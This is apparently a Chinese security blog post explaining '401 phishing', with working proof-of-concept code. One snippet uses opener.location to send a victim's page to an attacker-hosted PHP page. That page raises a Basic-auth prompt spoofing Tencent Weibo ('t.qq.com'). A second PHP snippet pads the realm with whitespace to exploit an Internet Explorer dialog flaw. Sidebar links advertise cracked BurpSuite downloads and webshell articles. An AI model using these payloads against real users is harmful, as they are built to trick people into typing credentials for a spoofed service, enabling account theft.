前段时间401钓鱼很火,大部分呢是通过向网页插入一个401地址的图片进行钓鱼.但这种方法对于chrome和不支持外链图片的站来说,例如:微博.
反向401钓鱼:
反向401的意思是通过opener.location反向控制调用页地址到401钓鱼页面.
poc:
opener.location='http://mmme.me/401.php'
close();
401.php:
<?php
header('WWW-Authenticate: Basic realm="t.qq.com"');
?>
<script>
history.back();//返回到腾讯微博
</script>
缺点:IE不支持.
IE空白符缺陷:
由于IE的401询问框设计错误,导致我们可以在服务器响应的认证提示信息后面追加大量的空白符将后面的默认内容挤掉,达到欺骗的目的.
POC:
<?php
header('WWW-Authenticate: Basic realm="t.qq.com "');
?>
IE8:
IE9:
学习
生活累,一小半源于生存,一大半源于攀比。
2016-10-5
BurpSuite 1.7.11破解版下载【附多/新版本下载】
2016-11-5
Connectify Dispatch指定程序使用指定网卡[运维神器]
2014-3-25
网站备案流程_网站备案需要什么[简单明了解决备案各种问题]
2018-2-3
最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】
2016-11-8
php一句话后门的几种变形分析[preg_replace函数]
2016-10-24
利用 LLMNR 名称解析缺陷劫持内网指定主机会话 - Her0in
2016-10-24
安全预警:国内超过300台juniper网络设备受后门影响 - mickey
2016-10-24
TFTP反射放大攻击浅析 - Larry
2016-11-1
【跟风贴】XSS挖出一个黑产团体
2016-11-1
说一说新手在寻找XSS时所存在的一些误区。
| 
云悉指纹